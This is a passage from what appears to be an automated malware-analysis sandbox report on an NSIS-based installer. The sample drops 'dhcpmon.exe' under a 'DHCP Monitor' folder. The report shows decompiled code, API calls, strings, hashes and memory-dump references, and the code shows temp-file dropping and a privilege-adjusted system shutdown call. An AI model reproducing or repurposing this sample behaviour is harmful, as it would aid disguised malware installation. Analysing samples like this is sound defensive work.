				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f44c = _t42;
				if(_t42 != 6) {
					_t119 = E00406656(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065E8(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406656(0xb);
				 *0x42f444 = E00406656(9);
				_t47 = E00406656(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f44f =  *0x42f44f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f518 = _t47;
				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
				E0040624D("Setup Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Program Files (x86)\\DHCP Monitor\\dhcpmon.exe\" 0";
				E0040624D(_t160, _t51);
				 *0x42f440 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Program Files (x86)\\DHCP Monitor\\dhcpmon.exe\" 0" == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E0040624D("C:\\Users\\alfons\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157); // executed
										_t59 = E00403455(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E0040396E();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4f4;
													if( *0x42f4f4 == 0) {
														L67:
														_t63 =  *0x42f50c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406656(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f460 == 0) {
												L42:
												 *0x42f50c =  *0x42f50c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
												goto L43;
											}
											_t153 = E00405C10(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058D4(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Program Files (x86)\\DHCP Monitor";
													if(lstrcmpiA(_t157, "C:\\Program Files (x86)\\DHCP Monitor") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E004058B7();
														} else {
															E0040583A();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E0040624D("C:\\Users\\alfons\\AppData\\Local\\Temp", _t162);
														}
														E0040624D(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
															DeleteFileA(0x429478);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Program Files (x86)\\DHCP Monitor\\dhcpmon.exe", 0x429478, 1) != 0) {
																E0040602C(_t137, 0x429478, 0);
																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
																_t94 = E004058EC(0x429478);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E0040602C(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CD3(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E0040624D("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
												E0040624D("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403455(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403455(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f500 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

APIs

SetErrorMode.KERNELBASE ref: 004034AB
GetVersion.KERNEL32 ref: 004034B1
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
OleInitialize.OLE32(00000000), ref: 00403527
SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
CharNextA.USER32(00000000,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,00000020,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,00000000,?,00000007,00000009,0000000B), ref: 00403594
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403691
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036C2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036F7

Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683

Part of subcall function 00403A60: lstrlenA.KERNEL32(Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,?,?,Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,7519FA90), ref: 00403B50
Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,?,?,Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.), ref: 00403B6E
Part of subcall function 00403A60: LoadImageA.USER32 ref: 00403BB7
Part of subcall function 00403A60: RegisterClassA.USER32 ref: 00403BF4

Part of subcall function 0040396E: CloseHandle.KERNEL32(000002B8,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
Part of subcall function 0040396E: CloseHandle.KERNEL32(000002D8,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994

OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 004037A5
ExitProcess.KERNEL32 ref: 004037C6
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
ExitWindowsEx.USER32 ref: 00403945
ExitProcess.KERNEL32 ref: 00403968

Part of subcall function 00405969: MessageBoxIndirectA.USER32 ref: 004059C4

Strings

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, xrefs: 00403883
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040349A
Low, xrefs: 004036C4
"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0, xrefs: 0040355E, 00403564, 0040371B
TEMP, xrefs: 004036D6
NSIS Error, xrefs: 00403549
UXTHEME, xrefs: 004034D8, 004034DD, 004034E3
~nsu, xrefs: 004037D1
", xrefs: 004035B9
1033, xrefs: 004036F2
C:\Users\user\AppData\Local\Temp, xrefs: 00403782
C:\Program Files (x86)\DHCP Monitor, xrefs: 004037F8, 004037FD, 00403829
SeShutdownPrivilege, xrefs: 004038FC
C:\Users\user\AppData\Local\Temp, xrefs: 00403676, 00403777, 00403821, 0040382A
.tmp, xrefs: 004037ED
TMP, xrefs: 004036DE
\Temp, xrefs: 004036A8
C:\Users\user\AppData\Local\Temp\, xrefs: 00403686, 0040368B, 004036A1, 004036AD, 004036BC, 004036C9, 004036D5, 004036DD, 004037D6, 004037E7, 004037F2, 004037FE, 0040380B, 0040381A, 004038C9
Error launching installer, xrefs: 0040375D
Setup Setup, xrefs: 0040354E

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0$.tmp$1033$C:\Program Files (x86)\DHCP Monitor$C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 538718688-2032495359
Opcode ID: 59846cb0e328dd3137fe6862d866a3f935b1e29978b84714f7053ce702f1765b
Instruction ID: 85d02637fd436e9256356bfe7db61a6cd0141c067df2f5210ca69e4cdec71f05
Opcode Fuzzy Hash: 59846cb0e328dd3137fe6862d866a3f935b1e29978b84714f7053ce702f1765b
Instruction Fuzzy Hash: C9C125705047416AD7217F719D49B2B3EACAF4170AF45487FF482B61E2CB7C8A198B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403A60, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403A60(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f454;
				_t17 = E00406656(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a8b8;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
					__eflags =  *0x42a8b8;
					if(__eflags == 0) {
						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E004061AB("1033",  *_t17() & 0x0000ffff);
				}
				E00403D25(_t71, _t84);
				_t80 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x42f4e0 =  *0x42f45c & 0x00000020;
				 *0x42f4fc = 0x10000;
				if(E00405CD3(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CD3(_t92, _t80) == 0) {
						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040);
					 *0x42ec28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D25(_t71, __eflags);
							__eflags =  *0x42f500;
							if( *0x42f500 != 0) {
								_t28 = E00405446(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ec0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a898, 5); // executed
							_t34 = E004065E8("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065E8("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebe0);
								 *0x42ec04 = _t81;
								RegisterClassA(0x42ebe0);
							}
							_t36 =  *0x42ec20; // 0x0
							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
							E004039B0(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f440;
						 *0x42ebe4 = E00401000;
						 *0x42ebf0 =  *0x42f440;
						 *0x42ebf4 = _t25;
						 *0x42ec04 = 0x40a210;
						if(RegisterClassA(0x42ebe0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3e0;
					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
					_t57 =  *0x42e3e0; // 0x45
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3e1;
						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E0040624D(_t80, E00405BE5(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C2C(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

APIs

Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683

lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,00000000), ref: 00403ADB
lstrlenA.KERNEL32(Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,?,?,Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,7519FA90), ref: 00403B50
lstrcmpiA.KERNEL32(?,.exe,Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,?,?,Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
GetFileAttributesA.KERNEL32(Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.), ref: 00403B6E
LoadImageA.USER32 ref: 00403BB7

Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8

RegisterClassA.USER32 ref: 00403BF4
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
CreateWindowExA.USER32 ref: 00403C41
ShowWindow.USER32(00000005,00000000), ref: 00403C77
GetClassInfoA.USER32 ref: 00403CA3
GetClassInfoA.USER32 ref: 00403CB0
RegisterClassA.USER32 ref: 00403CB9
DialogBoxParamA.USER32 ref: 00403CD8

Strings

"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0, xrefs: 00403A64
RichEdit, xrefs: 00403CAA
RichEdit20A, xrefs: 00403C9B, 00403CA1
.exe, xrefs: 00403B5D
Control Panel\Desktop\ResourceLocale, xrefs: 00403A94
RichEd20, xrefs: 00403C7D
B, xrefs: 00403BC6
Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file., xrefs: 00403B1E, 00403B26, 00403B33, 00403B7D, 00403B83
RichEd32, xrefs: 00403C8B
1033, xrefs: 00403A80, 00403AD6
.DEFAULT\Control Panel\International, xrefs: 00403AC6
C:\Users\user\AppData\Local\Temp, xrefs: 00403AEA, 00403AF2, 00403B8A, 00403B90, 00403BA0
C:\Users\user\AppData\Local\Temp\, xrefs: 00403A65
_Nb, xrefs: 00403BD3, 00403C3B

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
API String ID: 1975747703-3129095386
Opcode ID: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
Instruction ID: 8734c0f5f73e26911640e72846d54346a9337973c4420bd4a4a6803de24d7ebf
Opcode Fuzzy Hash: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
Instruction Fuzzy Hash: 1B61C6702042007EE620BF669D46F373AACDB4474DF94443FF945B62E2CA7DA9068A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 208
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402EF1(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				intOrPtr _t100;
				void* _t104;
				intOrPtr _t105;
				long _t106;
				long _t109;
				intOrPtr* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42f450 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Program Files (x86)\\DHCP Monitor\\dhcpmon.exe", 0x400);
				_t104 = E00405DE6("C:\\Program Files (x86)\\DHCP Monitor\\dhcpmon.exe", 0x80000000, 3);
				 *0x40a018 = _t104;
				if(_t104 == 0xffffffff) {
					return "Error launching installer";
				}
				E0040624D("C:\\Program Files (x86)\\DHCP Monitor", "C:\\Program Files (x86)\\DHCP Monitor\\dhcpmon.exe");
				E0040624D(0x437000, E00405C2C("C:\\Program Files (x86)\\DHCP Monitor"));
				_t54 = GetFileSize(_t104, 0);
				 *0x429470 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E52(1);
					if( *0x42f458 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t110 = GlobalAlloc(0x40, _v20);
						_t105 = 8;
						 *0x415458 = 0x40d450;
						 *0x415454 = 0x40d450;
						 *0x40b8b0 = _t105;
						 *0x40bdcc = 0;
						 *0x40bdc8 = 0;
						 *0x415450 = 0x415450; // executed
						E00405E15( &_v300, "C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E0040343E( *0x42f458 + 0x1c);
							 *0x429474 = _t65;
							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x42f454 = _t110;
								 *0x42f45c =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42f460 =  *0x42f460 + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t100 = _t105;
								do {
									_t70 = _t70 - _t105;
									 *_t70 =  *_t70 + _t110;
									_t100 = _t100 - 1;
								} while (_t100 != 0);
								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
								E00405DA1(0x42f480, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E0040343E( *0x429460);
					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						if(E00403428(0x421460, _t106) == 0) {
